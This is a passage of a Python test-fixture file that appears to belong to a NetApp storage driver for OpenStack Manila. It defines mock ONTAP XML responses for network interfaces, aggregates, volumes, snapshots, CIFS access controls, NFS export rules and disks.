'node': NODE_NAME,
'address': IP_ADDRESS,
'netmask': NETMASK,
'vlan': VLAN_PORT,
})
LIF_NAMES = ('cluster_mgmt', 'mgmt1', LIF_NAME)
NET_INTERFACE_GET_ITER_RESPONSE_NFS = etree.XML("""
<results status="passed">
<attributes-list>
<net-interface-info>
<address>%(address)s</address>
<address-family>ipv4</address-family>
<administrative-status>up</administrative-status>
<current-node>%(node)s</current-node>
<current-port>%(vlan)s</current-port>
<data-protocols>
<data-protocol>nfs</data-protocol>
<data-protocol>cifs</data-protocol>
</data-protocols>
<dns-domain-name>none</dns-domain-name>
<failover-group>system-defined</failover-group>
<failover-policy>nextavail</failover-policy>
<firewall-policy>data</firewall-policy>
<home-node>%(node)s</home-node>
<home-port>%(vlan)s</home-port>
<interface-name>%(lif)s</interface-name>
<is-auto-revert>false</is-auto-revert>
<is-home>true</is-home>
<lif-uuid>db4d91b6-95d9-11e4-8608-123478563412</lif-uuid>
<listen-for-dns-query>false</listen-for-dns-query>
<netmask>%(netmask)s</netmask>
<netmask-length>24</netmask-length>
<operational-status>up</operational-status>
<role>data</role>
<routing-group-name>d10.0.0.0/24</routing-group-name>
<use-failover-group>system_defined</use-failover-group>
<vserver>%(vserver)s</vserver>
</net-interface-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'lif': LIF_NAME,
'vserver': VSERVER_NAME,
'node': NODE_NAME,
'address': IP_ADDRESS,
'netmask': NETMASK,
'vlan': VLAN_PORT,
})
LIFS = (
{'address': '192.168.228.42',
'home-node': NODE_NAME,
'home-port': 'e0c',
'interface-name': 'cluster_mgmt',
'netmask': NETMASK,
'role': 'cluster_mgmt',
'vserver': 'cluster3'
},
{'address': '192.168.228.43',
'home-node': NODE_NAME,
'home-port': 'e0d',
'interface-name': 'mgmt1',
'netmask': NETMASK,
'role': 'node_mgmt',
'vserver': 'cluster3-01'
},
{'address': IP_ADDRESS,
'home-node': NODE_NAME,
'home-port': VLAN_PORT,
'interface-name': LIF_NAME,
'netmask': NETMASK,
'role': 'data',
'vserver': VSERVER_NAME,
},
)
NFS_LIFS = [
{'address': IP_ADDRESS,
'home-node': NODE_NAME,
'home-port': VLAN_PORT,
'interface-name': LIF_NAME,
'netmask': NETMASK,
'role': 'data',
'vserver': VSERVER_NAME,
},
]
NET_INTERFACE_GET_ONE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<net-interface-info>
<interface-name>%(lif)s</interface-name>
<vserver>%(vserver)s</vserver>
</net-interface-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'lif': LIF_NAME, 'vserver': VSERVER_NAME})
AGGR_GET_NAMES_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-raid-attributes>
</aggr-raid-attributes>
<aggregate-name>%(root1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
</aggr-raid-attributes>
<aggregate-name>%(root2)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
</aggr-raid-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
</aggr-raid-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'root1': ROOT_AGGREGATE_NAMES[0],
'root2': ROOT_AGGREGATE_NAMES[1],
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
})
AGGR_GET_SPACE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-raid-attributes>
<plexes>
<plex-attributes>
<plex-name>/%(aggr1)s/plex0</plex-name>
<raidgroups>
<raidgroup-attributes>
<raidgroup-name>/%(aggr1)s/plex0/rg0</raidgroup-name>
</raidgroup-attributes>
</raidgroups>
</plex-attributes>
</plexes>
</aggr-raid-attributes>
<aggr-space-attributes>
<size-available>45670400</size-available>
<size-total>943718400</size-total>
<size-used>898048000</size-used>
</aggr-space-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<plexes>
<plex-attributes>
<plex-name>/%(aggr2)s/plex0</plex-name>
<raidgroups>
<raidgroup-attributes>
<raidgroup-name>/%(aggr2)s/plex0/rg0</raidgroup-name>
</raidgroup-attributes>
<raidgroup-attributes>
<raidgroup-name>/%(aggr2)s/plex0/rg1</raidgroup-name>
</raidgroup-attributes>
</raidgroups>
</plex-attributes>
</plexes>
</aggr-raid-attributes>
<aggr-space-attributes>
<size-available>4267659264</size-available>
<size-total>7549747200</size-total>
<size-used>3282087936</size-used>
</aggr-space-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
})
AGGR_GET_NODE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-ownership-attributes>
<home-name>%(node)s</home-name>
</aggr-ownership-attributes>
<aggregate-name>%(aggr)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'aggr': SHARE_AGGREGATE_NAME,
'node': NODE_NAME
})
AGGR_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-64bit-upgrade-attributes>
<aggr-status-attributes>
<is-64-bit-upgrade-in-progress>false</is-64-bit-upgrade-in-progress>
</aggr-status-attributes>
</aggr-64bit-upgrade-attributes>
<aggr-fs-attributes>
<block-type>64_bit</block-type>
<fsid>1758646411</fsid>
<type>aggr</type>
</aggr-fs-attributes>
<aggr-inode-attributes>
<files-private-used>512</files-private-used>
<files-total>30384</files-total>
<files-used>96</files-used>
<inodefile-private-capacity>30384</inodefile-private-capacity>
<inodefile-public-capacity>30384</inodefile-public-capacity>
<maxfiles-available>30384</maxfiles-available>
<maxfiles-possible>243191</maxfiles-possible>
<maxfiles-used>96</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
</aggr-inode-attributes>
<aggr-ownership-attributes>
<home-id>4082368507</home-id>
<home-name>cluster3-01</home-name>
<owner-id>4082368507</owner-id>
<owner-name>cluster3-01</owner-name>
</aggr-ownership-attributes>
<aggr-performance-attributes>
<free-space-realloc>off</free-space-realloc>
<max-write-alloc-blocks>0</max-write-alloc-blocks>
</aggr-performance-attributes>
<aggr-raid-attributes>
<checksum-status>active</checksum-status>
<checksum-style>block</checksum-style>
<disk-count>3</disk-count>
<ha-policy>cfo</ha-policy>
<has-local-root>true</has-local-root>
<has-partner-root>false</has-partner-root>
<is-checksum-enabled>true</is-checksum-enabled>
<is-hybrid>false</is-hybrid>
<is-hybrid-enabled>false</is-hybrid-enabled>
<is-inconsistent>false</is-inconsistent>
<mirror-status>unmirrored</mirror-status>
<mount-state>online</mount-state>
<plex-count>1</plex-count>
<plexes>
<plex-attributes>
<is-online>true</is-online>
<is-resyncing>false</is-resyncing>
<plex-name>/%(aggr1)s/plex0</plex-name>
<plex-status>normal,active</plex-status>
<raidgroups>
<raidgroup-attributes>
<checksum-style>block</checksum-style>
<is-cache-tier>false</is-cache-tier>
<is-recomputing-parity>false</is-recomputing-parity>
<is-reconstructing>false</is-reconstructing>
<raidgroup-name>/%(aggr1)s/plex0/rg0</raidgroup-name>
<recomputing-parity-percentage>0</recomputing-parity-percentage>
<reconstruction-percentage>0</reconstruction-percentage>
</raidgroup-attributes>
</raidgroups>
<resyncing-percentage>0</resyncing-percentage>
</plex-attributes>
</plexes>
<raid-lost-write-state>on</raid-lost-write-state>
<raid-size>16</raid-size>
<raid-status>raid_dp, normal</raid-status>
<raid-type>raid_dp</raid-type>
<state>online</state>
</aggr-raid-attributes>
<aggr-snaplock-attributes>
<is-snaplock>false</is-snaplock>
</aggr-snaplock-attributes>
<aggr-snapshot-attributes>
<files-total>0</files-total>
<files-used>0</files-used>
<is-snapshot-auto-create-enabled>true</is-snapshot-auto-create-enabled>
<is-snapshot-auto-delete-enabled>true</is-snapshot-auto-delete-enabled>
<maxfiles-available>0</maxfiles-available>
<maxfiles-possible>0</maxfiles-possible>
<maxfiles-used>0</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
<percent-used-capacity>0</percent-used-capacity>
<size-available>0</size-available>
<size-total>0</size-total>
<size-used>0</size-used>
<snapshot-reserve-percent>0</snapshot-reserve-percent>
</aggr-snapshot-attributes>
<aggr-space-attributes>
<aggregate-metadata>245760</aggregate-metadata>
<hybrid-cache-size-total>0</hybrid-cache-size-total>
<percent-used-capacity>95</percent-used-capacity>
<size-available>45670400</size-available>
<size-total>943718400</size-total>
<size-used>898048000</size-used>
<total-reserved-space>0</total-reserved-space>
<used-including-snapshot-reserve>898048000</used-including-snapshot-reserve>
<volume-footprints>897802240</volume-footprints>
</aggr-space-attributes>
<aggr-volume-count-attributes>
<flexvol-count>1</flexvol-count>
<flexvol-count-collective>0</flexvol-count-collective>
<flexvol-count-striped>0</flexvol-count-striped>
</aggr-volume-count-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
<aggregate-uuid>15863632-ea49-49a8-9c88-2bd2d57c6d7a</aggregate-uuid>
<nodes>
<node-name>cluster3-01</node-name>
</nodes>
<striping-type>unknown</striping-type>
</aggr-attributes>
<aggr-attributes>
<aggr-64bit-upgrade-attributes>
<aggr-status-attributes>
<is-64-bit-upgrade-in-progress>false</is-64-bit-upgrade-in-progress>
</aggr-status-attributes>
</aggr-64bit-upgrade-attributes>
<aggr-fs-attributes>
<block-type>64_bit</block-type>
<fsid>706602229</fsid>
<type>aggr</type>
</aggr-fs-attributes>
<aggr-inode-attributes>
<files-private-used>528</files-private-used>
<files-total>31142</files-total>
<files-used>96</files-used>
<inodefile-private-capacity>31142</inodefile-private-capacity>
<inodefile-public-capacity>31142</inodefile-public-capacity>
<maxfiles-available>31142</maxfiles-available>
<maxfiles-possible>1945584</maxfiles-possible>
<maxfiles-used>96</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
</aggr-inode-attributes>
<aggr-ownership-attributes>
<home-id>4082368507</home-id>
<home-name>cluster3-01</home-name>
<owner-id>4082368507</owner-id>
<owner-name>cluster3-01</owner-name>
</aggr-ownership-attributes>
<aggr-performance-attributes>
<free-space-realloc>off</free-space-realloc>
<max-write-alloc-blocks>0</max-write-alloc-blocks>
</aggr-performance-attributes>
<aggr-raid-attributes>
<checksum-status>active</checksum-status>
<checksum-style>block</checksum-style>
<disk-count>10</disk-count>
<ha-policy>sfo</ha-policy>
<has-local-root>false</has-local-root>
<has-partner-root>false</has-partner-root>
<is-checksum-enabled>true</is-checksum-enabled>
<is-hybrid>false</is-hybrid>
<is-hybrid-enabled>false</is-hybrid-enabled>
<is-inconsistent>false</is-inconsistent>
<mirror-status>unmirrored</mirror-status>
<mount-state>online</mount-state>
<plex-count>1</plex-count>
<plexes>
<plex-attributes>
<is-online>true</is-online>
<is-resyncing>false</is-resyncing>
<plex-name>/%(aggr2)s/plex0</plex-name>
<plex-status>normal,active</plex-status>
<raidgroups>
<raidgroup-attributes>
<checksum-style>block</checksum-style>
<is-cache-tier>false</is-cache-tier>
<is-recomputing-parity>false</is-recomputing-parity>
<is-reconstructing>false</is-reconstructing>
<raidgroup-name>/%(aggr2)s/plex0/rg0</raidgroup-name>
<recomputing-parity-percentage>0</recomputing-parity-percentage>
<reconstruction-percentage>0</reconstruction-percentage>
</raidgroup-attributes>
<raidgroup-attributes>
<checksum-style>block</checksum-style>
<is-cache-tier>false</is-cache-tier>
<is-recomputing-parity>false</is-recomputing-parity>
<is-reconstructing>false</is-reconstructing>
<raidgroup-name>/%(aggr2)s/plex0/rg1</raidgroup-name>
<recomputing-parity-percentage>0</recomputing-parity-percentage>
<reconstruction-percentage>0</reconstruction-percentage>
</raidgroup-attributes>
</raidgroups>
<resyncing-percentage>0</resyncing-percentage>
</plex-attributes>
</plexes>
<raid-lost-write-state>on</raid-lost-write-state>
<raid-size>8</raid-size>
<raid-status>raid4, normal</raid-status>
<raid-type>raid4</raid-type>
<state>online</state>
</aggr-raid-attributes>
<aggr-snaplock-attributes>
<is-snaplock>false</is-snaplock>
</aggr-snaplock-attributes>
<aggr-snapshot-attributes>
<files-total>0</files-total>
<files-used>0</files-used>
<is-snapshot-auto-create-enabled>true</is-snapshot-auto-create-enabled>
<is-snapshot-auto-delete-enabled>true</is-snapshot-auto-delete-enabled>
<maxfiles-available>0</maxfiles-available>
<maxfiles-possible>0</maxfiles-possible>
<maxfiles-used>0</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
<percent-used-capacity>0</percent-used-capacity>
<size-available>0</size-available>
<size-total>0</size-total>
<size-used>0</size-used>
<snapshot-reserve-percent>0</snapshot-reserve-percent>
</aggr-snapshot-attributes>
<aggr-space-attributes>
<aggregate-metadata>425984</aggregate-metadata>
<hybrid-cache-size-total>0</hybrid-cache-size-total>
<percent-used-capacity>15</percent-used-capacity>
<size-available>6448431104</size-available>
<size-total>7549747200</size-total>
<size-used>1101316096</size-used>
<total-reserved-space>0</total-reserved-space>
<used-including-snapshot-reserve>1101316096</used-including-snapshot-reserve>
<volume-footprints>1100890112</volume-footprints>
</aggr-space-attributes>
<aggr-volume-count-attributes>
<flexvol-count>2</flexvol-count>
<flexvol-count-collective>0</flexvol-count-collective>
<flexvol-count-striped>0</flexvol-count-striped>
</aggr-volume-count-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
<aggregate-uuid>2a741934-1aaf-42dd-93ca-aaf231be108a</aggregate-uuid>
<nodes>
<node-name>cluster3-01</node-name>
</nodes>
<striping-type>not_striped</striping-type>
</aggr-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
})
AGGR_GET_ITER_SSC_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-64bit-upgrade-attributes>
<aggr-status-attributes>
<is-64-bit-upgrade-in-progress>false</is-64-bit-upgrade-in-progress>
</aggr-status-attributes>
</aggr-64bit-upgrade-attributes>
<aggr-fs-attributes>
<block-type>64_bit</block-type>
<fsid>1758646411</fsid>
<type>aggr</type>
</aggr-fs-attributes>
<aggr-inode-attributes>
<files-private-used>512</files-private-used>
<files-total>30384</files-total>
<files-used>96</files-used>
<inodefile-private-capacity>30384</inodefile-private-capacity>
<inodefile-public-capacity>30384</inodefile-public-capacity>
<maxfiles-available>30384</maxfiles-available>
<maxfiles-possible>243191</maxfiles-possible>
<maxfiles-used>96</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
</aggr-inode-attributes>
<aggr-ownership-attributes>
<home-id>4082368507</home-id>
<home-name>cluster3-01</home-name>
<owner-id>4082368507</owner-id>
<owner-name>cluster3-01</owner-name>
</aggr-ownership-attributes>
<aggr-performance-attributes>
<free-space-realloc>off</free-space-realloc>
<max-write-alloc-blocks>0</max-write-alloc-blocks>
</aggr-performance-attributes>
<aggr-raid-attributes>
<checksum-status>active</checksum-status>
<checksum-style>block</checksum-style>
<disk-count>3</disk-count>
<ha-policy>cfo</ha-policy>
<has-local-root>true</has-local-root>
<has-partner-root>false</has-partner-root>
<is-checksum-enabled>true</is-checksum-enabled>
<is-hybrid>false</is-hybrid>
<is-hybrid-enabled>false</is-hybrid-enabled>
<is-inconsistent>false</is-inconsistent>
<mirror-status>unmirrored</mirror-status>
<mount-state>online</mount-state>
<plex-count>1</plex-count>
<plexes>
<plex-attributes>
<is-online>true</is-online>
<is-resyncing>false</is-resyncing>
<plex-name>/%(aggr1)s/plex0</plex-name>
<plex-status>normal,active</plex-status>
<raidgroups>
<raidgroup-attributes>
<checksum-style>block</checksum-style>
<is-cache-tier>false</is-cache-tier>
<is-recomputing-parity>false</is-recomputing-parity>
<is-reconstructing>false</is-reconstructing>
<raidgroup-name>/%(aggr1)s/plex0/rg0</raidgroup-name>
<recomputing-parity-percentage>0</recomputing-parity-percentage>
<reconstruction-percentage>0</reconstruction-percentage>
</raidgroup-attributes>
</raidgroups>
<resyncing-percentage>0</resyncing-percentage>
</plex-attributes>
</plexes>
<raid-lost-write-state>on</raid-lost-write-state>
<raid-size>16</raid-size>
<raid-status>raid_dp, normal</raid-status>
<raid-type>raid_dp</raid-type>
<state>online</state>
</aggr-raid-attributes>
<aggr-snaplock-attributes>
<is-snaplock>false</is-snaplock>
</aggr-snaplock-attributes>
<aggr-snapshot-attributes>
<files-total>0</files-total>
<files-used>0</files-used>
<is-snapshot-auto-create-enabled>true</is-snapshot-auto-create-enabled>
<is-snapshot-auto-delete-enabled>true</is-snapshot-auto-delete-enabled>
<maxfiles-available>0</maxfiles-available>
<maxfiles-possible>0</maxfiles-possible>
<maxfiles-used>0</maxfiles-used>
<percent-inode-used-capacity>0</percent-inode-used-capacity>
<percent-used-capacity>0</percent-used-capacity>
<size-available>0</size-available>
<size-total>0</size-total>
<size-used>0</size-used>
<snapshot-reserve-percent>0</snapshot-reserve-percent>
</aggr-snapshot-attributes>
<aggr-space-attributes>
<aggregate-metadata>245760</aggregate-metadata>
<hybrid-cache-size-total>0</hybrid-cache-size-total>
<percent-used-capacity>95</percent-used-capacity>
<size-available>45670400</size-available>
<size-total>943718400</size-total>
<size-used>898048000</size-used>
<total-reserved-space>0</total-reserved-space>
<used-including-snapshot-reserve>898048000</used-including-snapshot-reserve>
<volume-footprints>897802240</volume-footprints>
</aggr-space-attributes>
<aggr-volume-count-attributes>
<flexvol-count>1</flexvol-count>
<flexvol-count-collective>0</flexvol-count-collective>
<flexvol-count-striped>0</flexvol-count-striped>
</aggr-volume-count-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
<aggregate-uuid>15863632-ea49-49a8-9c88-2bd2d57c6d7a</aggregate-uuid>
<nodes>
<node-name>cluster3-01</node-name>
</nodes>
<striping-type>unknown</striping-type>
</aggr-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'aggr1': SHARE_AGGREGATE_NAMES[0]})
AGGR_GET_ITER_ROOT_AGGR_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>true</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(root1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>true</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(root2)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>false</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>false</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>6</num-records>
</results>
""" % {
'root1': ROOT_AGGREGATE_NAMES[0],
'root2': ROOT_AGGREGATE_NAMES[1],
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
})
AGGR_GET_ITER_NON_ROOT_AGGR_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>false</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<has-local-root>false</has-local-root>
<has-partner-root>false</has-partner-root>
</aggr-raid-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>6</num-records>
</results>
""" % {
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
})
VOLUME_GET_NAME_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<volume-attributes>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {'volume': SHARE_NAME, 'vserver': VSERVER_NAME})
VOLUME_GET_VOLUME_PATH_RESPONSE = etree.XML("""
<results status="passed">
<junction>/%(volume)s</junction>
</results>
""" % {'volume': SHARE_NAME})
VOLUME_GET_VOLUME_PATH_CIFS_RESPONSE = etree.XML("""
<results status="passed">
<junction>\\%(volume)s</junction>
</results>
""" % {'volume': SHARE_NAME})
VOLUME_JUNCTION_PATH = '/' + SHARE_NAME
VOLUME_JUNCTION_PATH_CIFS = '\\' + SHARE_NAME
VOLUME_MODIFY_ITER_RESPONSE = etree.XML("""
<results status="passed">
<failure-list />
<num-failed>0</num-failed>
<num-succeeded>1</num-succeeded>
<success-list>
<volume-modify-iter-info>
<volume-key>
<volume-attributes>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</volume-key>
</volume-modify-iter-info>
</success-list>
</results>
""" % {'volume': SHARE_NAME, 'vserver': VSERVER_NAME})
VOLUME_MODIFY_ITER_ERROR_RESPONSE = etree.XML("""
<results status="passed">
<failure-list>
<volume-modify-iter-info>
<error-code>160</error-code>
<error-message>Unable to set volume attribute "size"</error-message>
<volume-key>
<volume-attributes>
<volume-id-attributes>
<name>%(volume)s</name>
<owning-vserver-name>%(vserver)s</owning-vserver-name>
</volume-id-attributes>
</volume-attributes>
</volume-key>
</volume-modify-iter-info>
</failure-list>
<num-failed>1</num-failed>
<num-succeeded>0</num-succeeded>
</results>
""" % {'volume': SHARE_NAME, 'vserver': VSERVER_NAME})
SNAPSHOT_ACCESS_TIME = '1466640058'
SNAPSHOT_GET_ITER_NOT_BUSY_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapshot-info>
<access-time>%(access_time)s</access-time>
<busy>false</busy>
<name>%(snap)s</name>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</snapshot-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'access_time': SNAPSHOT_ACCESS_TIME,
'snap': SNAPSHOT_NAME,
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
})
SNAPSHOT_GET_ITER_BUSY_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapshot-info>
<access-time>%(access_time)s</access-time>
<busy>true</busy>
<name>%(snap)s</name>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
<snapshot-owners-list>
<snapshot-owner>
<owner>volume clone</owner>
</snapshot-owner>
</snapshot-owners-list>
</snapshot-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'access_time': SNAPSHOT_ACCESS_TIME,
'snap': SNAPSHOT_NAME,
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
})
SNAPSHOT_GET_ITER_NOT_UNIQUE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapshot-info>
<busy>false</busy>
<name>%(snap)s</name>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</snapshot-info>
<snapshot-info>
<busy>false</busy>
<name>%(snap)s</name>
<volume>%(root_volume)s</volume>
<vserver>%(admin_vserver)s</vserver>
</snapshot-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'snap': SNAPSHOT_NAME,
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
'root_volume': ROOT_VOLUME_NAME,
'admin_vserver': ADMIN_VSERVER_NAME,
})
SNAPSHOT_GET_ITER_UNAVAILABLE_RESPONSE = etree.XML("""
<results status="passed">
<num-records>0</num-records>
<volume-errors>
<volume-error>
<errno>13023</errno>
<name>%(volume)s</name>
<reason>Unable to get information for Snapshot copies of volume \
"%(volume)s" on Vserver "%(vserver)s". Reason: Volume not online.</reason>
<vserver>%(vserver)s</vserver>
</volume-error>
</volume-errors>
</results>
""" % {'volume': SHARE_NAME, 'vserver': VSERVER_NAME})
SNAPSHOT_GET_ITER_OTHER_ERROR_RESPONSE = etree.XML("""
<results status="passed">
<num-records>0</num-records>
<volume-errors>
<volume-error>
<errno>99999</errno>
<name>%(volume)s</name>
<reason>Unable to get information for Snapshot copies of volume \
"%(volume)s" on Vserver "%(vserver)s".</reason>
<vserver>%(vserver)s</vserver>
</volume-error>
</volume-errors>
</results>
""" % {'volume': SHARE_NAME, 'vserver': VSERVER_NAME})
SNAPSHOT_MULTIDELETE_ERROR_RESPONSE = etree.XML("""
<results status="passed">
<volume-errors>
<volume-error>
<errno>13021</errno>
<name>%(volume)s</name>
<reason>No such snapshot.</reason>
</volume-error>
</volume-errors>
</results>
""" % {'volume': SHARE_NAME})
SNAPSHOT_GET_ITER_DELETED_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapshot-info>
<name>deleted_manila_%(snap)s</name>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</snapshot-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'snap': SNAPSHOT_NAME,
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
})
SNAPSHOT_GET_ITER_SNAPMIRROR_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<snapshot-info>
<name>%(snap)s</name>
<volume>%(volume)s</volume>
<vserver>%(vserver)s</vserver>
</snapshot-info>
</attributes-list>
<num-records>1</num-records>
</results>
""" % {
'snap': SNAPSHOT_NAME,
'volume': SHARE_NAME,
'vserver': VSERVER_NAME,
})
CIFS_SHARE_ACCESS_CONTROL_GET_ITER = etree.XML("""
<results status="passed">
<attributes-list>
<cifs-share-access-control>
<permission>full_control</permission>
<share>%(volume)s</share>
<user-or-group>Administrator</user-or-group>
<vserver>manila_svm_cifs</vserver>
</cifs-share-access-control>
<cifs-share-access-control>
<permission>change</permission>
<share>%(volume)s</share>
<user-or-group>Administrators</user-or-group>
<vserver>manila_svm_cifs</vserver>
</cifs-share-access-control>
<cifs-share-access-control>
<permission>read</permission>
<share>%(volume)s</share>
<user-or-group>Power Users</user-or-group>
<vserver>manila_svm_cifs</vserver>
</cifs-share-access-control>
<cifs-share-access-control>
<permission>no_access</permission>
<share>%(volume)s</share>
<user-or-group>Users</user-or-group>
<vserver>manila_svm_cifs</vserver>
</cifs-share-access-control>
</attributes-list>
<num-records>4</num-records>
</results>
""" % {'volume': SHARE_NAME})
NFS_EXPORT_RULES = ('10.10.10.10', '10.10.10.20')
NFS_EXPORTFS_LIST_RULES_2_NO_RULES_RESPONSE = etree.XML("""
<results status="passed">
<rules />
</results>
""")
NFS_EXPORTFS_LIST_RULES_2_RESPONSE = etree.XML("""
<results status="passed">
<rules>
<exports-rule-info-2>
<pathname>%(path)s</pathname>
<security-rules>
<security-rule-info>
<anon>65534</anon>
<nosuid>false</nosuid>
<read-only>
<exports-hostname-info>
<name>%(host1)s</name>
</exports-hostname-info>
<exports-hostname-info>
<name>%(host2)s</name>
</exports-hostname-info>
</read-only>
<read-write>
<exports-hostname-info>
<name>%(host1)s</name>
</exports-hostname-info>
<exports-hostname-info>
<name>%(host2)s</name>
</exports-hostname-info>
</read-write>
<root>
<exports-hostname-info>
<name>%(host1)s</name>
</exports-hostname-info>
<exports-hostname-info>
<name>%(host2)s</name>
</exports-hostname-info>
</root>
<sec-flavor>
<sec-flavor-info>
<flavor>sys</flavor>
</sec-flavor-info>
</sec-flavor>
</security-rule-info>
</security-rules>
</exports-rule-info-2>
</rules>
</results>
""" % {
'path': VOLUME_JUNCTION_PATH,
'host1': NFS_EXPORT_RULES[0],
'host2': NFS_EXPORT_RULES[1],
})
AGGR_GET_RAID_TYPE_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<aggr-attributes>
<aggr-raid-attributes>
<plexes>
<plex-attributes>
<plex-name>/%(aggr1)s/plex0</plex-name>
<raidgroups>
<raidgroup-attributes>
<raidgroup-name>/%(aggr1)s/plex0/rg0</raidgroup-name>
</raidgroup-attributes>
</raidgroups>
</plex-attributes>
</plexes>
<raid-type>%(raid_type1)s</raid-type>
</aggr-raid-attributes>
<aggregate-name>%(aggr1)s</aggregate-name>
</aggr-attributes>
<aggr-attributes>
<aggr-raid-attributes>
<plexes>
<plex-attributes>
<plex-name>/%(aggr2)s/plex0</plex-name>
<raidgroups>
<raidgroup-attributes>
<raidgroup-name>/%(aggr2)s/plex0/rg0</raidgroup-name>
</raidgroup-attributes>
<raidgroup-attributes>
<raidgroup-name>/%(aggr2)s/plex0/rg1</raidgroup-name>
</raidgroup-attributes>
</raidgroups>
</plex-attributes>
</plexes>
<raid-type>%(raid_type2)s</raid-type>
</aggr-raid-attributes>
<aggregate-name>%(aggr2)s</aggregate-name>
</aggr-attributes>
</attributes-list>
<num-records>2</num-records>
</results>
""" % {
'aggr1': SHARE_AGGREGATE_NAMES[0],
'aggr2': SHARE_AGGREGATE_NAMES[1],
'raid_type1': SHARE_AGGREGATE_RAID_TYPES[0],
'raid_type2': SHARE_AGGREGATE_RAID_TYPES[1]
})
STORAGE_DISK_GET_ITER_RESPONSE = etree.XML("""
<results status="passed">
<attributes-list>
<storage-disk-info>
<disk-name>cluster3-01:v5.19</disk-name>
<disk-raid-info>
<effective-disk-type>%(type0)s</effective-disk-type>
</disk-raid-info>
</storage-disk-info>
<storage-disk-info>
<disk-name>cluster3-01:v5.20</disk-name>
<disk-raid-info>
<effective-disk-type>%(type0)s</effective-disk-type>
</disk-raid-info>
